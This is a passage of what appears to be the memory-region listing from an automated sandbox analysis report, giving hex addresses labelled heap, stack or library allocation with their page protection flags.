page read and write
|
||
25EACA8A000
|
heap
|
page read and write
|
||
25EAE3D0000
|
heap
|
page read and write
|
||
22564EF3000
|
heap
|
page read and write
|
||
22565CD1000
|
heap
|
page read and write
|
||
22565CDB000
|
heap
|
page read and write
|
||
210C144E000
|
heap
|
page read and write
|
||
7FFD9B552000
|
trusted library allocation
|
page read and write
|
||
DDBFABF000
|
stack
|
page read and write
|
||
22563185000
|
heap
|
page read and write
|
||
245F2885000
|
heap
|
page read and write
|
||
25EAE760000
|
heap
|
page read and write
|
||
22565CD9000
|
heap
|
page read and write
|
||
210C309B000
|
heap
|
page read and write
|
||
54AF5FE000
|
stack
|
page read and write
|
||
28503A34000
|
heap
|
page read and write
|
||
210C12D0000
|
heap
|
page read and write
|
||
2851DB30000
|
heap
|
page read and write
|
||
210C12C7000
|
heap
|
page read and write
|
||
22564EA1000
|
heap
|
page read and write
|
||
22563185000
|
heap
|
page read and write
|
||
210C30E6000
|
heap
|
page read and write
|
||
210C1234000
|
heap
|
page read and write
|
||
22564F2B000
|
heap
|
page read and write
|
||
28505905000
|
trusted library allocation
|
page read and write
|
||
897D87E000
|
stack
|
page read and write
|
||
22564EF3000
|
heap
|
page read and write
|
||
245F24C0000
|
heap
|
page read and write
|
||
7FFD9B710000
|
trusted library allocation
|
page execute and read and write
|
||
225652A0000
|
heap
|
page read and write
|
||
25EB02B0000
|
heap
|
page read and write
|
||
22564EF3000
|
heap
|
page read and write
|
||
1D401401000
|
trusted library allocation
|
page read and write
|
||
25EAE815000
|
heap
|
page read and write
|
||
2851DAB5000
|
heap
|
page read and write
|
||
245F2830000
|
heap
|
page execute and read and write
|
||
BCFCDFE000
|
stack
|
page read and write
|
||
22563185000
|
heap
|
page read and write
|
||
28503B20000
|
trusted library allocation
|
page read and write
|
||
25EAE941000
|
heap
|
page read and write
|
||
7FFD9B7A0000
|
trusted library allocation
|
page read and write
|
||
245F271A000
|
heap
|
page read and write
|
||
22565B61000
|
heap
|
page read and write
|
||
28503B40000
|
trusted library allocation
|
page read and write
|
||
25EAE9E5000
|
heap
|
page read and write
|
||
28503985000
|
heap
|
page read and write
|
||
210C3156000
|
heap
|
page read and write
|
||
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
25EAE77F000
|
heap
|
page read and write
|
||
210C12D3000
|
heap
|
page read and write
|
||
225630F5000
|
heap
|
page read and write
|
||
210C3270000
|
heap
|
page read and write
|
||
25EAE767000
|
heap
|
page read and write
|
||
25EAE747000
|
heap
|
page read and write
|
||
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
22564E80000
|
heap
|
page read and write
|
||
225659AF000
|
heap
|
page read and write
|
||
2851DAF3000
|
heap
|
page read and write
|
||
245F2648000
|
heap
|
page read and write
|
||
24580481000
|
trusted library allocation
|
page read and write
|
||
225654D0000
|
trusted library allocation
|
page read and write
|
||
210C11B0000
|
heap
|
page read and write
|
||
22565090000
|
remote allocation
|
page read and write
|
||
F96BDBE000
|
stack
|
page read and write
|
||
210C3085000
|
heap
|
page read and write
|
||
2458011A000
|
trusted library allocation
|
page read and write
|
||
25EAE7DA000
|
heap
|
page read and write
|
||
210C3074000
|
heap
|
page read and write
|
||
25EAE3F0000
|
heap
|
page read and write
|
||
210C1440000
|
heap
|
page read and write
|
||
210C3101000
|
heap
|
page read and write
|
||
25EACA85000
|
heap
|
page read and write
|
||
22565BCE000
|
heap
|
page read and write
|
||
2458011D000
|
trusted library allocation
|
page read and write
|
||
25EAE74C000
|
heap
|
page read and write
|
||
210C1229000
|
heap
|
page read and write
|
||
22564B30000
|
heap
|
page read and write
|
||
24580732000
|
trusted library allocation
|
page read and write
|
||
245F47A0000
|
heap
|
page read and write
|
||
210C12B5000
|
heap
|
page read and write
|
||
210C3271000
|
heap
|
page read and write
|
||
2256592E000
|
heap
|
page read and write
|
||
25EAE760000
|
heap
|
page read and write
|
||
25EAC92B000
|
heap
|
page read and write
|
||
7FFD9B740000
|
trusted library allocation
|
page execute and read and write
|
||
DDBF77F000
|
stack
|
page read and write
|
||
7FFD9B600000
|
trusted library allocation
|
page read and write
|
||
210C12A9000
|
heap
|
page read and write
|
||
210C3170000
|
heap
|
page read and write
|
||
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
25EAC9F3000
|
heap
|
page read and write
|
||
22563185000
|
heap
|
page read and write
|
||
2256316D000
|
heap
|
page read and write
|
||
285059E7000
|
trusted library allocation
|
page read and write
|
||
210C3079000
|
heap
|
page read and write
|
||
210C12D9000
|
heap
|
page read and write
|
||
22564EF3000
|
heap
|
page read and write
|
||
2256595F000
|
heap
|
page read and write
|
||
7FFD9B740000
|
trusted library allocation
|
page execute and read and write
|
||
28505A30000
|
trusted library allocation
|
page read and write
|
||
22565090000
|
remote allocation
|
page read and write
|
||
7FFD9B850000
|
trusted library allocation
|
page read and write
|
||
25EAE7B6000
|
heap
|
page read and write
|
||
22564EB3000
|
heap
|
page read and write
|
||
245F2770000
|
trusted library allocation
|
page read and write
|
||
54AF3FF000
|
stack
|
page read and write
|
||
210C3090000
|
heap
|
page read and write
|
||
25EAC9E0000
|
heap
|
page read and write
|
||
22565D45000
|
heap
|
page read and write
|
||
7FFD9B670000
|
trusted library allocation
|
page execute and read and write
|
||
25EAC9EF000
|
heap
|
page read and write
|
||
22563085000
|
heap
|
page read and write
|
||
28503940000
|
heap
|
page read and write
|
||
285158E1000
|
trusted library allocation
|
page read and write
|
||
210C3126000
|
heap
|
page read and write
|
||
A2C4BFF000
|
stack
|
page read and write
|
||
22563020000
|
heap
|
page read and write
|
||
285059E1000
|
trusted library allocation
|
page read and write
|
||
22565CCE000
|
heap
|
page read and write
|
||
7FFD9B670000
|
trusted library allocation
|
page execute and read and write
|
||
225659C7000
|
heap
|
page read and write
|
||
897D7FE000
|
stack
|
page read and write
|
||
25EAC9EB000
|
heap
|
page read and write
|
||
22564E95000
|
heap
|
page read and write
|
||
22565CEE000
|
heap
|
page read and write
|
||
2458057F000
|
trusted library allocation
|
page read and write
|
||
25EAC9E0000
|
heap
|
page read and write
|
||
897D9BE000
|
stack
|
page read and write
|
||
22564E84000
|
heap
|
page read and write
|
||
22565D54000
|
heap
|
page read and write
|
||
210C30BC000
|
heap
|
page read and write
|
||
22565CD1000
|
heap
|
page read and write
|
||
F96BBBE000
|
stack
|
page read and write
|
||
1D400A01000
|
trusted library allocation
|
page read and write
|
||
2851DA52000
|
heap
|
page read and write
|
||
25EAE746000
|
heap
|
page read and write
|
||
25EAE741000
|
heap
|
page read and write
|
||
28505594000
|
heap
|
page read and write
|
||
285059F6000
|
trusted library allocation
|
page read and write
|
||
1D40A801000
|
trusted library allocation
|
page read and write
|
||
22565CCE000
|
heap
|
page read and write
|
||
210C12D1000
|
heap
|
page read and write
|
||
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
225630CF000
|
heap
|
page read and write
|
||
22565958000
|
heap
|
page read and write
|
||
225658F7000
|
heap
|
page read and write
|
||
210C3112000
|
heap
|
page read and write
|
||
54AEEF9000
|
stack
|
page read and write
|
||
BCFCCFF000
|
stack
|
page read and write
|
||
210C3314000
|
heap
|
page read and write
|
||
F96BA7F000
|
stack
|
page read and write
|
||
BCFCEFE000
|
stack
|
page read and write
|
||
210C307F000
|
heap
|
page read and write
|
||
210C1220000
|
heap
|
page read and write
|
||
210C31D3000
|
heap
|
page read and write
|
||
2256598D000
|
heap
|
page read and write
|
||
2256592E000
|
heap
|
page read and write
|
||
54AF4FE000
|
stack
|
page read and write
|
||
2851DA10000
|
heap
|
page read and write
|
||
210C12D5000
|
heap
|
page read and write
|
||
7FFD9B6F2000
|
trusted library allocation
|
page read and write
|
||
2256598D000
|
heap
|
page read and write
|
||
245F4567000
|
heap
|
page read and write
|
||
285039C3000
|
heap
|
page read and write
|
||
DDBFA3F000
|
stack
|
page read and write
|
||
25EAC93A000
|
heap
|
page read and write
|
||
28503989000
|
heap
|
page read and write
|
||
245F4591000
|
heap
|
page read and write
|
||
BCFD3FC000
|
stack
|
page read and write
|
||
28505DA6000
|
trusted library allocation
|
page read and write
|
||
210C30C3000
|
heap
|
page read and write
|
||
22564F2B000
|
heap
|
page read and write
|
||
245F266C000
|
heap
|
page read and write
|
||
25EAE7FD000
|
heap
|
page read and write
|
||
245F44BB000
|
heap
|
page read and write
|
||
25EAE7E2000
|
heap
|
page read and write
|
||
285158F1000
|
trusted library allocation
|
page read and write
|
||
245F44B1000
|
heap
|
page read and write
|
||
25EAE773000
|
heap
|
page read and write
|
||
210C3171000
|
heap
|
page read and write
|
||
225659CB000
|
heap
|
page read and write
|
||
7FFD9B840000
|
trusted library allocation
|
page read and write
|
||
DDBF8B9000
|
stack
|
page read and write
|
||
25EAE93E000
|
heap
|
page read and write
|
||
2256316F000
|
heap
|
page read and write
|
||
2851DAAB000
|
heap
|
page read and write
|
||
897DD3E000
|
stack
|
page read and write
|
||
210C3154000
|
heap
|
page read and write
|
||
210C314E000
|
heap
|
page read and write
|
||
245F4501000
|
heap
|
page read and write
|
||
2850397C000
|
heap
|
page read and write
|
||
22565020000
|
heap
|
page read and write
|
||
7FFD9B750000
|
trusted library allocation
|
page read and write
|
||
DDBF4FF000
|
stack
|
page read and write
|
||
7FFD9B7B0000
|
trusted library allocation
|
page read and write
|
||
22564E8D000
|
heap
|
page read and write
|
||
210C30A8000
|
heap
|
page read and write
|
||
2256316F000
|
heap
|
page read and write
|
||
25EAE7EE000
|
heap
|
page read and write
|
||
210C30B4000
|
heap
|
page read and write
|
||
210C30C0000
|
heap
|
page read and write
|
||
245F4490000
|
heap
|
page read and write
|
||
7FFD9B800000
|
trusted library allocation
|
page read and write
|
||
7FFD9B750000
|
trusted library allocation
|
page read and write
|
||
210C312D000
|
heap
|
page read and write
|
||
225658E0000
|
heap
|
page read and write
|
||
210C30F6000
|
heap
|
page read and write
|
||
2851DC80000
|
heap
|
page read and write
|
||
210C3145000
|
heap
|
page read and write
|
||
22565BC2000
|
heap
|
page read and write
|
||
7FFD9B701000
|
trusted library allocation
|
page read and write
|
||
285039C8000
|
heap
|
page read and write
|
||
2458071E000
|
trusted library allocation
|
page read and write
|
||
DDBF1D2000
|
stack
|
page read and write
|
||
210C308B000
|
heap
|
page read and write
|
||
22564E9D000
|
heap
|
page read and write
|
||
2256316D000
|
heap
|
page read and write
|
||
22565CCE000
|
heap
|
page read and write
|
||
7FFD9B860000
|
trusted library allocation
|
page read and write
|
||
225630B8000
|
heap
|
page read and write
|
||
245F26B2000
|
heap
|
page read and write
|
||
245F25A0000
|
heap
|
page read and write
|
||
DDBF83E000
|
stack
|
page read and write
|
||
245F2810000
|
trusted library allocation
|
page read and write
|
||
245F2780000
|
heap
|
page execute and read and write
|
||
210C307F000
|
heap
|
page read and write
|
||
DDBF9B8000
|
stack
|
page read and write
|
||
210C3139000
|
heap
|
page read and write
|
||
210C326E000
|
heap
|
page read and write
|
||
28515956000
|
trusted library allocation
|
page read and write
|
||
25EAC94F000
|
heap
|
page read and write
|
||
2851DA50000
|
heap
|
page read and write
|
||
210C12A0000
|
heap
|
page read and write
|
||
897D77D000
|
stack
|
page read and write
|
||
22565BCE000
|
heap
|
page read and write
|
||
210C123D000
|
heap
|
page read and write
|
||
210C30A3000
|
heap
|
page read and write
|
||
7FFD9B7C0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B820000
|
trusted library allocation
|
page read and write
|
||
DDBFC3B000
|
stack
|
page read and write
|
||
7FFD9B7C0000
|
trusted library allocation
|
page read and write
|
||
22565D0F000
|
heap
|
page read and write
|
||
22565B8F000
|
heap
|
page read and write
|
||
225659B8000
|
heap
|
page read and write
|
||
210C30B7000
|
heap
|
page read and write
|
||
7FFD9B60C000
|
trusted library allocation
|
page execute and read and write
|
||
210C144D000
|
heap
|
page read and write
|
||
210C312A000
|
heap
|
page read and write
|
||
25EAC9F3000
|
heap
|
page read and write
|
||
22564ECE000
|
heap
|
page read and write
|
||
25EAC9DB000
|
heap
|
page read and write
|
||
BCFC5A4000
|
stack
|
page read and write
|
||
210C3097000
|
heap
|
page read and write
|
||
225658E2000
|
heap
|
page read and write
|
||
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
25EAE93C000
|
heap
|
page read and write
|
||
25EAE750000
|
heap
|
page read and write
|
||
210C12DC000
|
heap
|
page read and write
|
||
7DF4C1260000
|
trusted library allocation
|
page execute and read and write
|
||
F96BEBE000
|
stack
|
page read and write
|
||
210C4F50000
|
trusted library allocation
|
page read and write
|
||
22565AD0000
|
heap
|
page read and write
|
||
210C31D3000
|
heap
|
page read and write
|
||
22564EDD000
|
heap
|
page read and write
|
||
210C12AD000
|
heap
|
page read and write
|
||
7FFD9B7E0000
|
trusted library allocation
|
page read and write
|
||
225659B8000
|
heap
|
page read and write
|
||
22564EF5000
|
heap
|
page read and write
|
||
25EB02AA000
|
heap
|
page read and write
|
||
25EACA88000
|
heap
|
page read and write
|
||
210C4C00000
|
heap
|
page read and write
|
||
25EACA80000
|
heap
|
page read and write
|
||
210C12A0000
|
heap
|
page read and write
|
||
210C123A000
|
heap
|
page read and write
|
||
22565BCE000
|
heap
|
page read and write
|
||
25EAE93E000
|
heap
|
page read and write
|
||
25EAE767000
|
heap
|
page read and write
|
||
25EAE76B000
|
heap
|
page read and write
|
||
BCFC9FE000
|
stack
|
page read and write
|
||
1D400001000
|
trusted library allocation
|
page read and write
|
||
7FFD9B701000
|
trusted library allocation
|
page read and write
|
||
210C3145000
|
heap
|
page read and write
|
||
210C3086000
|
heap
|
page read and write
|
||
2851DA06000
|
heap
|
page execute and read and write
|
||
DDBFBBE000
|
stack
|
page read and write
|
||
7FFD9B800000
|
trusted library allocation
|
page read and write
|
||
22565090000
|
remote allocation
|
page read and write
|
||
897D6FE000
|
stack
|
page read and write
|
||
7FFD9B55D000
|
trusted library allocation
|
page execute and read and write
|
||
25EAE7B9000
|
heap
|
page read and write
|
||
24580060000
|
trusted library allocation
|
page read and write
|
||
25EAE841000
|
heap
|
page read and write
|
||
245F4572000
|
heap
|
page read and write
|
||
25EAC918000
|
heap
|
page read and write
|
||
210C1220000
|
heap
|
page read and write
|
||
A2C49FE000
|
stack
|
page read and write
|
||
BCFCFFB000
|
stack
|
page read and write
|
||
897DB3C000
|
stack
|
page read and write
|
||
210C3121000
|
heap
|
page read and write
|
||
2256316D000
|
heap
|
page read and write
|
||
25EAC9E6000
|
heap
|
page read and write
|
||
7FFD9B70A000
|
trusted library allocation
|
page read and write
|
||
28503910000
|
heap
|
page read and write
|
||
22564E9E000
|
heap
|
page read and write
|
||
245F2758000
|
heap
|
page read and write
|
||
22565D58000
|
heap
|
page read and write
|
||
25EAC830000
|
heap
|
page read and write
|
||
210C31D5000
|
heap
|
page read and write
|
||
22563185000
|
heap
|
page read and write
|
||
DDC060E000
|
stack
|
page read and write
|
||
25EAE812000
|
heap
|
page read and write
|
||
897DAB9000
|
stack
|
page read and write
|
||
225651C0000
|
heap
|
page read and write
|
||
DDBF6FE000
|
stack
|
page read and write
|
||
22563185000
|
heap
|
page read and write
|
||
245F2678000
|
heap
|
page read and write
|
||
22565D66000
|
heap
|
page read and write
|
||
225659B8000
|
heap
|
page read and write
|
||
7FFD9B636000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B70A000
|
trusted library allocation
|
page read and write
|
||
225659C4000
|
heap
|
page read and write
|
||
F96B87E000
|
stack
|
page read and write
|
||
F96B7FE000
|
stack
|
page read and write
|
||
210C3315000
|
heap
|
page read and write
|
||
210C144A000
|
heap
|
page read and write
|
||
25EAE744000
|
heap
|
page read and write
|
||
245F2750000
|
heap
|
page read and write
|
||
25EAC9F3000
|
heap
|
page read and write
|
||
210C12A9000
|
heap
|
page read and write
|
||
2458012B000
|
trusted library allocation
|
page read and write
|
||
25EAE8A3000
|
heap
|
page read and write
|
||
22565BCE000
|
heap
|
page read and write
|
||
7FFD9B760000
|
trusted library allocation
|
page read and write
|
||
2458047C000
|
trusted library allocation
|
page read and write
|
||
210C12CE000
|
heap
|
page read and write
|
||
2851DB10000
|
heap
|
page read and write
|
||
25EAE778000
|
heap
|
page read and write
|
||
210C12A9000
|
heap
|
page read and write
|
||
225658E7000
|
heap
|
page read and write
|
||
28505520000
|
heap
|
page execute and read and write
|
||
2851DCB7000
|
heap
|
page read and write
|
||
2851DA4E000
|
heap
|
page read and write
|
||
7FFD9B850000
|
trusted library allocation
|
page read and write
|
||
245F4AF0000
|
heap
|
page read and write
|
||
2850399D000
|
heap
|
page read and write
|
||
210C12C9000
|
heap
|
page read and write
|
||
25EAC9EB000
|
heap
|
page read and write
|
||
1D409E01000
|
trusted library allocation
|
page read and write
|
||
22564EAE000
|
heap
|
page read and write
|
||
25EAE7E5000
|
heap
|
page read and write
|
||
210C30FE000
|
heap
|
page read and write
|
||
25EAE93C000
|
heap
|
page read and write
|
||
22565CCE000
|
heap
|
page read and write
|
||
28503C54000
|
heap
|
page read and write
|
||
25EAC93A000
|
heap
|
page read and write
|
||
22565C71000
|
heap
|
page read and write
|
||
210C12DC000
|
heap
|
page read and write
|
||
7FFD9B560000
|
trusted library allocation
|
page read and write
|
||
25EAE756000
|
heap
|
page read and write
|
||
245F2756000
|
heap
|
page read and write
|
||
22565CB4000
|
heap
|
page read and write
|
||
25EAC910000
|
heap
|
page read and write
|
||
2458012E000
|
trusted library allocation
|
page read and write
|
||
210C123E000
|
heap
|
page read and write
|
||
25EAC940000
|
heap
|
page read and write
|
||
25EAC93A000
|
heap
|
page read and write
|
||
F96B9FF000
|
stack
|
page read and write
|
||
22564EF3000
|
heap
|
page read and write
|
||
225658FC000
|
heap
|
page read and write
|
||
25EAC9DF000
|
heap
|
page read and write
|
||
22564EF3000
|
heap
|
page read and write
|
||
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
22564EA6000
|
heap
|
page read and write
|
||
7FFD9B606000
|
trusted library allocation
|
page read and write
|
||
25EAE7A1000
|
heap
|
page read and write
|
||
22564EF3000
|
heap
|
page read and write
|
||
210C12CD000
|
heap
|
page read and write
|
||
22564E81000
|
heap
|
page read and write
|
||
7FFD9B56B000
|
trusted library allocation
|
page read and write
|
||
F96BB3F000
|
stack
|
page read and write
|
||
25EAE7CE000
|
heap
|
page read and write
|
||
25EAE7F6000
|
heap
|
page read and write
|
||
22564E85000
|
heap
|
page read and write
|
||
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
25EAE767000
|
heap
|
page read and write
|
||
1D40B201000
|
trusted library allocation
|
page read and write
|
||
25EAE7D1000
|
heap
|
page read and write
|
||
28503C5E000
|
heap
|
page read and write
|
||
22565CD4000
|
heap
|
page read and write
|
||
7FFD9B610000
|
trusted library allocation
|
page execute and read and write
|
||
225658FC000
|
heap
|
page read and write
|
||
25EAC9F3000
|
heap
|
page read and write
|
||
BCFD1FE000
|
stack
|
page read and write
|
||
210C121B000
|
heap
|
page read and write
|
||
25EAE940000
|
heap
|
page read and write
|
||
25EACA89000
|
heap
|
page read and write
|
||
25EAE7FA000
|
heap
|
page read and write
|
||
897E80D000
|
stack
|
page read and write
|
||
245F2650000
|
heap
|
page read and write
|
||
2459000F000
|
trusted library allocation
|
page read and write
|
||
25EACA8E000
|
heap
|
page read and write
|
||
897DCBE000
|
stack
|
page read and write
|
||
25EAE93E000
|
heap
|
page read and write
|
||
245803E8000
|
trusted library allocation
|
page read and write
|
||
22565CFA000
|
heap
|
page read and write
|
||
210C3094000
|
heap
|
page read and write
|
||
22564E9D000
|
heap
|
page read and write
|
||
225659C5000
|
heap
|
page read and write
|
||
2256594B000
|
heap
|
page read and write
|
||
25EAC9DC000
|
heap
|
page read and write
|
||
28503C50000
|
heap
|
page read and write
|
||
210C310A000
|
heap
|
page read and write
|
||
22564EF3000
|
heap
|
page read and write
|
||
897DA38000
|
stack
|
page read and write
|
||
25EACA8D000
|
heap
|
page read and write
|
||
24580434000
|
trusted library allocation
|
page read and write
|
||
22565B36000
|
heap
|
page read and write
|
||
25EAC94D000
|
heap
|
page read and write
|
||
28505D82000
|
trusted library allocation
|
page read and write
|
||
25EAC939000
|
heap
|
page read and write
|
||
210C123B000
|
heap
|
page read and write
|
||
210C311E000
|
heap
|
page read and write
|
||
28505D3B000
|
trusted library allocation
|
page read and write
|
||
BCFC8FE000
|
stack
|
page read and write
|
||
22565380000
|
heap
|
page read and write
|
||
245F26D4000
|
heap
|
page read and write
|
||
210C3097000
|
heap
|
page read and write
|
||
22564ECB000
|
heap
|
page read and write
|
||
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
25EAC9B2000
|
heap
|
page read and write
|
||
25EAE7F1000
|
heap
|
page read and write
|
||
210C315B000
|
heap
|
page read and write
|
||
7FFD9B870000
|
trusted library allocation
|
page read and write
|
||
285038B0000
|
heap
|
page read and write
|
||
22565C34000
|
heap
|
page read and write
|
||
25EB02A9000
|
heap
|
page read and write
|
||
54AF2FE000
|
stack
|
page read and write
|
||
210C12A9000
|
heap
|
page read and write
|
||
25EAE824000
|
heap
|
page read and write
|
||
285059F9000
|
trusted library allocation
|
page read and write
|
||
1D408A01000
|
trusted library allocation
|
page read and write
|
||
210C4C07000
|
heap
|
page read and write
|
||
225630B9000
|
heap
|
page read and write
|
||
28505DDC000
|
trusted library allocation
|
page read and write
|
||
210C3097000
|
heap
|
page read and write
|
||
225650E5000
|
heap
|
page read and write
|
||
210C3080000
|
heap
|
page read and write
|
||
7FFD9B7F0000
|
trusted library allocation
|
page read and write
|
||
25EAE7B1000
|
heap
|
page read and write
|
||
285038A0000
|
heap
|
page read and write
|
||
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
210C30AF000
|
heap
|
page read and write
|
||
25EAC9C2000
|
heap
|
page read and write
|
||
22564E92000
|
heap
|
page read and write
|
||
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
25EAE82B000
|
heap
|
page read and write
|
||
210C326C000
|
heap
|
page read and write
|
||
7FFD9B7F0000
|
trusted library allocation
|
page read and write
|
||
22563080000
|
heap
|
page read and write
|
||
25EAC940000
|
heap
|
page read and write
|
||
F96B97E000
|
stack
|
page read and write
|
||
28505540000
|
heap
|
page read and write
|
||
1D408001000
|
trusted library allocation
|
page read and write
|
||
7FFD9B840000
|
trusted library allocation
|
page read and write
|
||
22565CEA000
|
heap
|
page read and write
|
||
22565AE6000
|
heap
|
page read and write
|
||
225659B8000
|
heap
|
page read and write
|
||
25EAE767000
|
heap
|
page read and write
|
||
225658EB000
|
heap
|
page read and write
|
||
25EB05D0000
|
trusted library allocation
|
page read and write
|
||
2256316F000
|
heap
|
page read and write
|
||
BCFD0FE000
|
stack
|
page read and write
|
||
210C122D000
|
heap
|
page read and write
|
||
1D409401000
|
trusted library allocation
|
page read and write
|
||
24580051000
|
trusted library allocation
|
page read and write
|
||
A2C4519000
|
stack
|
page read and write
|
||
24590076000
|
trusted library allocation
|
page read and write
|
||
28505D60000
|
trusted library allocation
|
page read and write
|
||
210C3090000
|
heap
|
page read and write
|
||
22564EF3000
|
heap
|
page read and write
|
||
7FFD9B870000
|
trusted library allocation
|
page read and write
|
||
DDBF67E000
|
stack
|
page read and write
|
||
285058E1000
|
trusted library allocation
|
page read and write
|
||
54AF0FE000
|
stack
|
page read and write
|
||
25EACA88000
|
heap
|
page read and write
|
||
210C1235000
|
heap
|
page read and write
|
||
25EAC9F3000
|
heap
|
page read and write
|
||
210C1208000
|
heap
|
page read and write
|
||
25EAE790000
|
heap
|
page read and write
|
||
245F44E5000
|
heap
|
page read and write
|
||
2851DA00000
|
heap
|
page execute and read and write
|
||
25EAC9E1000
|
heap
|
page read and write
|
||
7FFD9B554000
|
trusted library allocation
|
page read and write
|
||
210C12DC000
|
heap
|
page read and write
|
||
225659C5000
|
heap
|
page read and write
|
||
897E78E000
|
stack
|
page read and write
|
||
210C11C0000
|
heap
|
page read and write
|
||
25EAE9E4000
|
heap
|
page read and write
|
||
25EAE767000
|
heap
|
page read and write
|
||
897D979000
|
stack
|
page read and write
|
||
25EAC9E3000
|
heap
|
page read and write
|
||
2458006A000
|
trusted library allocation
|
page read and write
|
||
7FFD9B600000
|
trusted library allocation
|
page read and write
|
||
245F44A0000
|
heap
|
page read and write
|
||
210C1449000
|
heap
|
page read and write
|
||
7FFD9B7E0000
|
trusted library allocation
|
page read and write
|
||
25EAC93F000
|
heap
|
page read and write
|
||
210C11E0000
|
heap
|
page read and write
|
||
22564ED8000
|
heap
|
page read and write
|
||
897DBBE000
|
stack
|
page read and write
|
||
245805CC000
|
trusted library allocation
|
page read and write
|
||
22564EC3000
|
heap
|
page read and write
|
||
22564E82000
|
heap
|
page read and write
|
||
22564E92000
|
heap
|
page read and write
|
||
2256316D000
|
heap
|
page read and write
|
||
25EAC94B000
|
heap
|
page read and write
|
||
210C12D6000
|
heap
|
page read and write
|
||
28503B60000
|
trusted library allocation
|
page read and write
|
||
28505590000
|
heap
|
page read and write
|
||
245805BF000
|
trusted library allocation
|
page read and write
|
||
22564E86000
|
heap
|
page read and write
|
||
897D3DE000
|
stack
|
page read and write
|
||
245F2836000
|
heap
|
page execute and read and write
|
||
210C122E000
|
heap
|
page read and write
|
||
225659C0000
|
heap
|
page read and write
|
||
245F25C0000
|
heap
|
page read and write
|
||
22564E82000
|
heap
|
page read and write
|
||
24580131000
|
trusted library allocation
|
page read and write
|
||
25EAE75B000
|
heap
|
page read and write
|
||
210C3071000
|
heap
|
page read and write
|
||
22563090000
|
heap
|
page read and write
|
||
25EAE809000
|
heap
|
page read and write
|
||
25EAE76C000
|
heap
|
page read and write
|
||
25EAC9E3000
|
heap
|
page read and write
|
||
7FFD9B820000
|
trusted library allocation
|
page read and write
|
||
210C3071000
|
heap
|
page read and write
|
||
245F456D000
|
heap
|
page read and write
|
||
22565BCE000
|
heap
|
page read and write
|
||
210C12DC000
|
heap
|
page read and write
|
||
22565D45000
|
heap
|
page read and write
|
||
24580554000
|
trusted library allocation
|
page read and write
|
||
22564E86000
|
heap
|
page read and write
|
||
22563098000
|
heap
|
page read and write
|
||
210C1448000
|
heap
|
page read and write
|
||
7FFD9B7D0000
|
trusted library allocation
|
page read and write
|
||
285059DE000
|
trusted library allocation
|
page read and write
|
||
A2C4CFE000
|
stack
|
page read and write
|
||
22565CDB000
|
heap
|
page read and write
|
||
225650E0000
|
heap
|
page read and write
|
||
1D401E01000
|
trusted library allocation
|
page read and write
|
||
245F44EE000
|
heap
|
page read and write
|
||
22564E8A000
|
heap
|
page read and write
|
||
210C3090000
|
heap
|
page read and write
|
||
25EAE764000
|
heap
|
page read and write
|
||
245F266E000
|
heap
|
page read and write
|
||
25EAE82F000
|
heap
|
page read and write
|
||
2256598D000
|
heap
|
page read and write
|
||
245F2790000
|
heap
|
page readonly
|
||
7FFD9B553000
|
trusted library allocation
|
page execute and read and write
|
||
DDBF57E000
|
stack
|
page read and write
|
||
22563000000
|
heap
|
page read and write
|
||
210C326C000
|
heap
|
page read and write
|
||
7FFD9B7A0000
|
trusted library allocation
|
page read and write
|
||
210C3077000
|
heap
|
page read and write
|
||
25EAC9D9000
|
heap
|
page read and write
|
||
22565AD1000
|
heap
|
page read and write
|
||
210C4E00000
|
heap
|
page read and write
|
||
210C12D3000
|
heap
|
page read and write
|
||
210C315F000
|
heap
|
page read and write
|
||
25EAE760000
|
heap
|
page read and write
|
||
7FFD9B553000
|
trusted library allocation
|
page execute and read and write
|
||
25EAE81E000
|
heap
|
page read and write
|
||
7FFD9B720000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B760000
|
trusted library allocation
|
page read and write
|
||
210C308B000
|
heap
|
page read and write
|
||
210C12B6000
|
heap
|
page read and write
|
||
BCFCBFF000
|
stack
|
page read and write
|
||
F96B673000
|
stack
|
page read and write
|
||
7FFD9B860000
|
trusted library allocation
|
page read and write
|
||
22565D61000
|
heap
|
page read and write
|
||
210C3097000
|
heap
|
page read and write
|
||
22564EBB000
|
heap
|
page read and write
|
||
7FFD9B7B0000
|
trusted library allocation
|
page read and write
|
||
25EAC9F3000
|
heap
|
page read and write
|
||
2256598D000
|
heap
|
page read and write
|
||
22563126000
|
heap
|
page read and write
|
||
245F46B2000
|
heap
|
page read and write
|
||
245F2600000
|
heap
|
page read and write
|
||
F96BF3B000
|
stack
|
page read and write
|
||
245F456B000
|
heap
|
page read and write
|
||
210C3136000
|
heap
|
page read and write
|
||
24580617000
|
trusted library allocation
|
page read and write
|
||
245F2880000
|
heap
|
page read and write
|
||
25EAE78C000
|
heap
|
page read and write
|
||
7FFD9B732000
|
trusted library allocation
|
page read and write
|
||
25EAE754000
|
heap
|
page read and write
|
||
25EAE787000
|
heap
|
page read and write
|
||
25EAC940000
|
heap
|
page read and write
|
||
28503948000
|
heap
|
page read and write
|
||
285039C5000
|
heap
|
page read and write
|
||
28503BA0000
|
heap
|
page execute and read and write
|
||
28505969000
|
trusted library allocation
|
page read and write
|
||
22565BF9000
|
heap
|
page read and write
|
||
25EAE749000
|
heap
|
page read and write
|
||
22564EB6000
|
heap
|
page read and write
|
||
25EACA10000
|
heap
|
page read and write
|
||
2458016B000
|
trusted library allocation
|
page read and write
|
||
210C12CF000
|
heap
|
page read and write
|
||
897DC3E000
|
stack
|
page read and write
|
||
2458001F000
|
trusted library allocation
|
page read and write
|
||
25EAE806000
|
heap
|
page read and write
|
||
25EAC9BD000
|
heap
|
page read and write
|
||
22565D52000
|
heap
|
page read and write
|
||
25EAE74F000
|
heap
|
page read and write
|
||
22565CFC000
|
heap
|
page read and write
|
||
210C3097000
|
heap
|
page read and write
|
||
24580117000
|
trusted library allocation
|
page read and write
|
||
25EAC930000
|
heap
|
page read and write
|
||
2851DA4B000
|
heap
|
page read and write
|
||
22564E8E000
|
heap
|
page read and write
|
||
25EAC9B2000
|
heap
|
page read and write
|
||
